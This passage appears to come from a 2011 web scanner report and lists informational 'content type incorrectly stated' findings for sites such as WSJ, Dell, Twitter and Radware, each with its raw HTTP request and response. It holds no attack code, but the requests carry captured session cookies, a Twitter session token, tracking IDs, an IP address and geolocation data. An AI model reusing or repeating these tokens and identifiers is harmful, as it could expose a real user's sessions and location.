P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 16:18:32 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

26.27. http://online.wsj.com/djscript/latest/dojo/cldr/nls/en/number.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /djscript/latest/dojo/cldr/nls/en/number.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /djscript/latest/dojo/cldr/nls/en/number.js HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; DJSESSION=continent%3dna%7c%7czip%3d95101%7c%7ccountry%3dus%7c%7cregion%3dca%7c%7cORCS%3dna%2cus%7c%7ccity%3dsanjose%7c%7clongitude%3d%2d121.8938%7c%7ctimezone%3dpst%7c%7clatitude%3d37.3353; DJCOOKIE=ORC%3dna%2cus; wsjregion=na%2cus; mbox=check#true#1315153132|session#1315153071377-944839#1315154932; __g_u=481626360709892_1_1_1_5_1315585072683; __g_c=w%3A1%7Cb%3A2%7Cc%3A481626360709892%7Cd%3A1%7Ca%3A3%7Ce%3A1%7Cf%3A1%7Cr%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:29 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep01 - Thu 03/17/11 - 13:50:46 EDT
Last-Modified: Thu, 17 Mar 2011 17:50:46 GMT
Cache-Control: max-age=3628800
Expires: Sun, 16 Oct 2011 16:17:29 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 674
Content-Type: application/x-javascript
Content-Language: en

({"decimal":".","group":",","list":";","percentSign":"%","nativeZeroDigit":"0","patternDigit":"#","plusSign":"+","minusSign":"-","exponential":"E","perMille":"......","infinity":"......","nan":"NaN","
...[SNIP]...

26.28. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /public/page/0_0_WC_HeaderWeather-10005.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /public/page/0_0_WC_HeaderWeather-10005.html HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; DJSESSION=continent%3dna%7c%7czip%3d95101%7c%7ccountry%3dus%7c%7cregion%3dca%7c%7cORCS%3dna%2cus%7c%7ccity%3dsanjose%7c%7clongitude%3d%2d121.8938%7c%7ctimezone%3dpst%7c%7clatitude%3d37.3353; wsjregion=na%2cus; mbox=check#true#1315153132|session#1315153071377-944839#1315154932; __g_u=481626360709892_1_1_1_5_1315585072683; __g_c=w%3A1%7Cb%3A2%7Cc%3A481626360709892%7Cd%3A1%7Ca%3A3%7Ce%3A1%7Cf%3A1%7Cr%3A; DJCOOKIE=ORC%3Dna%2Cus%7C%7CGC%3D1%7C%7CGX%3DMon%2C%2005%20Sep%202011%2016%3A18%3A04%20GMT

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:27 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep03 - Fri 09/02/11 - 00:27:24 EDT
Cache-Control: max-age=15
Expires: Sun, 04 Sep 2011 16:17:42 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 924
Content-Type: text/html; charset=UTF-8


<ul class="local-info">
<li class="location"><a id="w_location" href="http://online.wsj.com/public/page/accuweather-detailed-forecast.html?name=New York, NY&location=10005&u=http%3A//www.accuweathe
...[SNIP]...

26.29. http://samples.msdn.microsoft.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://samples.msdn.microsoft.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
Host: samples.msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_NVR=0=/:1=en-us:2=en-us/library|en-us/evalcenter|en-us/security; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; TOptOut=1; ADS=SN=175A21EF; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; s_cc=true; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315178628206:ss=1315178628206; s_sq=msstomsdn%2Cmsstomsdnonly%2Cmsstomsdnmktenus%2Cmsstolibrollup%2Cmsstolibwebdev%2Cmsstouberie%3D%2526pid%253Dmsdn%25253A/en-us/library/ms533897%2526pidt%253D1%2526oid%253Dhttp%25253A//samples.msdn.microsoft.com/workshop/samples/author/dhtml/refs/insertScript_2.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:29:37 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

26.30. http://search.dell.com/public/menu.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search.dell.com
Path:   /public/menu.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /public/menu.aspx?c=us&l=en&s=bsd&cs=04 HTTP/1.1
Host: search.dell.com
Proxy-Connection: keep-alive
Referer: http://search.dell.com/results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; search_bn=us|bsd|SearchBaynoteEnabled.1; dellsearch=srchb=control&rpp=12; StormPCookie=bandwidth=NA; StormSCookie=bandwidth=NA

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:20:00 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:20:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 68855

// menu definition for c=us&l=en&s=bsd&cs=04
//
var m_0_0_Menu = new Array( new menuItem( "Laptops", "http://www.dell.com/p/vostro-laptop-deals.aspx?c=us&cs=04&l=en&s=bsd" ), new menuItem( "Desktops
...[SNIP]...

26.31. http://search2.skype.com/search/bb-ratings.cgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search2.skype.com
Path:   /search/bb-ratings.cgi

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /search/bb-ratings.cgi HTTP/1.1
Host: search2.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:20 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29

Your feedback has been logged

26.32. http://stream1d.radware.net/cdn/images/home/quicknav/ui-bg_glass_100_f6f6f6_1x400.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stream1d.radware.net
Path:   /cdn/images/home/quicknav/ui-bg_glass_100_f6f6f6_1x400.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /cdn/images/home/quicknav/ui-bg_glass_100_f6f6f6_1x400.png HTTP/1.1
Host: stream1d.radware.net
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: foKFppsXZ0TmHapRTJV7nlDQGhPJa6QWUzJwF1TGkMd68/WzQpsIQSSyhXgCAHAq
x-amz-request-id: 674075BCA5558A7C
Date: Mon, 11 Jul 2011 21:35:51 GMT
Expires: Fri, 16 Apr 2010 14:19:41 GMT
Last-Modified: Fri, 29 Oct 2010 15:52:39 GMT
ETag: "5f1847175ba18c41322cb9cb0581e0fb"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 104
Server: AmazonS3
Age: 75879
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 1010adc59da6fa8de089e5085bd1bc36960125c11a71a0503b7fd84ee9a3e48dc358665a0abbe255
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 50ce79d11488558ae66a3f9bac6f0faa.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

.PNG
.
...IHDR.............oX
..../IDAT8..... ......."..". ..dkf..$...$.....-.<....
..+.P....IEND.B`.

26.33. http://stream1d.radware.net/cdn/images/home/quicknav/ui-bg_highlight-soft_100_eeeeee_1x100.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stream1d.radware.net
Path:   /cdn/images/home/quicknav/ui-bg_highlight-soft_100_eeeeee_1x100.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /cdn/images/home/quicknav/ui-bg_highlight-soft_100_eeeeee_1x100.png HTTP/1.1
Host: stream1d.radware.net
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: hbMW0qIsoyY9zO0sCBB3jhWBtVfGFedItorB/BPCDba3cTAPa2jazqo6X622hww7
x-amz-request-id: 393EADE0692925AA
Date: Mon, 11 Apr 2011 23:50:46 GMT
Expires: Fri, 16 Apr 2010 14:19:41 GMT
Last-Modified: Fri, 29 Oct 2010 15:52:39 GMT
ETag: "384c3f17709ba0f809b023b6e7b10b84"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 90
Server: AmazonS3
Age: 7899
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 95516753ce9345fe05b0d85fe159741a29a4c5ad63b9cca7658bf9eb4488423d8d58ab8aafa5ecb8
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 50ce79d11488558ae66a3f9bac6f0faa.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

.PNG
.
...IHDR.......d.....G,Z`...!IDAT..c....&....!D....;...~..D....".........IEND.B`.

26.34. http://stream1d.radware.net/cdn/images/home/quicknav/ui-icons_888888_256x240.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stream1d.radware.net
Path:   /cdn/images/home/quicknav/ui-icons_888888_256x240.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /cdn/images/home/quicknav/ui-icons_888888_256x240.png HTTP/1.1
Host: stream1d.radware.net
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: JXK/3junM8NoeJUX/VdCyqC4kRALM4+Z1Co2op/nUxWpqCNe/r37meOHLQwYQs+t
x-amz-request-id: 5406016803A704A8
Date: Mon, 11 Apr 2011 23:50:46 GMT
Expires: Fri, 16 Apr 2010 14:19:41 GMT
Last-Modified: Fri, 29 Oct 2010 15:52:39 GMT
ETag: "9c46d7cab43e22a14bad26d2d4806d80"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 4369
Server: AmazonS3
Age: 7897
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 7449a0623a0640789d6ac1edb067b801d5f7e2430a8b2c899f28b214151ff93613a78c20cd00bef9
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 50ce79d11488558ae66a3f9bac6f0faa.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

.PNG
.
...IHDR..............IJ.....PLTE...............................................................................................................................................................
...[SNIP]...

26.35. http://trk.etrigue.com/track.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trk.etrigue.com
Path:   /track.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /track.php?ie=1&a1017=&b1017=&a1017exit=&a=1017&c=8&callback=etrigue1315153232083 HTTP/1.1
Host: trk.etrigue.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:19:52 GMT
Content-Length: 26

etrigue1315153232083=null;

26.36. http://twitter.com/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /statuses/user_timeline.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /statuses/user_timeline.json?screen_name=wallstreetoasis&callback=TWTR.Widget.receiveCallback_1&count=50&since_id=110001000575807490&refresh=true&clientsource=TWITTERINC_WIDGET HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; js=1; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr%2BrEV4uzbIAWjTvweLcyYpT59HGYP%2B9gKCR3jGJtGBHN6LdF4J09YSdzvDFONo5RPhQjNiPm7n71Q%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCM%252B7OjUyAToHaWQiJTgyNThmOWM1YTIyYTZi%250AMDhkYTAyMzUxYTQ1YTUyZDc2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--dbd4dbd7e532ceab2c297475eff5de0a3a20b486

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:20:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315153215-45008-26753
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 16:20:15 GMT
X-RateLimit-Remaining: 116
X-Runtime: 0.10660
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 7dfe6a9254709e0a4aa78c1261609a421bfcca56
X-RateLimit-Reset: 1315156634
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCM%252B7OjUyAToHaWQiJTgyNThmOWM1YTIyYTZi%250AMDhkYTAyMzUxYTQ1YTUyZDc2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--dbd4dbd7e532ceab2c297475eff5de0a3a20b486; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

26.37. http://www-cdn.dell.com/content/public/menu.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www-cdn.dell.com
Path:   /content/public/menu.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /content/public/menu.aspx?c=us&l=en&s=bsd&cs=04 HTTP/1.1
Host: www-cdn.dell.com
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 04 Sep 2011 09:21:40 GMT
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Vary: Accept-Encoding
Content-Length: 63606
Date: Sun, 04 Sep 2011 16:19:07 GMT
Connection: close
Cache-Control: public, max-age=1800

// menu definition for c=us&l=en&s=bsd&cs=04
//
var m_0_0_Menu = new Array( new menuItem( "Laptops", "http://www.dell.com/p/vostro-laptop-deals.aspx?c=us&cs=04&l=en&s=bsd" ), new menuItem( "Desktops
...[SNIP]...

26.38. http://www.cgisecurity.com/.services/json-rpc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cgisecurity.com
Path:   /.services/json-rpc

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

POST /.services/json-rpc HTTP/1.1
Host: www.cgisecurity.com
Proxy-Connection: keep-alive
Referer: http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml
Content-Length: 72
Origin: http://www.cgisecurity.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/javascript+json
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmb=193669823; __utmc=193669823; __utma=193669823.2128938469.1315189433.1315189433.1315189433.1; __utmz=193669823.1315189433.1.1.utmccn=(organic)|utmcsr=google|utmctr=Referrer+data+found+in+displayed+innerHTML#sclient=psy|utmcmd=organic

{"method":"Page.LookupByTypepadId","params":[{"typepad_id":"61569656"}]}

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web021
X-Webserver: oak-tp-web021
Vary: cookie,Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Length: 70
Date: Mon, 05 Sep 2011 02:23:22 GMT
X-Varnish: 2785508930
Age: 0
Via: 1.1 varnish

{"error":null,"id":null,"result":"6a00e553aa1a288833010536e2b7ac970c"}

26.39. http://www.cgisecurity.com/.shared/images/atpcomment-gradient.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cgisecurity.com
Path:   /.shared/images/atpcomment-gradient.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /.shared/images/atpcomment-gradient.png HTTP/1.1
Host: www.cgisecurity.com
Proxy-Connection: keep-alive
Referer: http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmb=193669823; __utmc=193669823; __utma=193669823.2128938469.1315189433.1315189433.1315189433.1; __utmz=193669823.1315189433.1.1.utmccn=(organic)|utmcsr=google|utmctr=Referrer+data+found+in+displayed+innerHTML#sclient=psy|utmcmd=organic

Response

HTTP/1.1 200 OK
Server: Perlbal
Last-Modified: Tue, 12 Jul 2011 17:44:33 GMT
Accept-Ranges: bytes
Content-Type: image/png
Expires: Tue, 04 Sep 2012 02:23:22 GMT
Cache-Control: public; post-check=1200,pre-check=1800
Content-Length: 198
Date: Mon, 05 Sep 2011 02:23:22 GMT
X-Varnish: 2785509022
Age: 0
Via: 1.1 varnish

GIF89a..Z....................................................!.......,......Z...s..I..........d..G...{....3-.w.....?... ..H.`.X.....`.P..D..Mt.`..+N.    h3z.h...8. o7..;.....v........................;

26.40. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.demosondemand.com
Path:   /shared_components/javascript/launchDemoStage3PlayerClient_js.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /shared_components/javascript/launchDemoStage3PlayerClient_js.asp HTTP/1.1
Host: www.demosondemand.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1655
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBRACDB=MDAFPIDBCNGIHBMKEPNKOOLA; path=/
Cache-control: private


function launchDemoStage3Player(session_id, promotion_id,startTime,reseller_id )
{
       var initialW = 250;
var initialH = 200;
var x = (screen.width/2)-initialW/2;
var y
...[SNIP]...

26.41. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

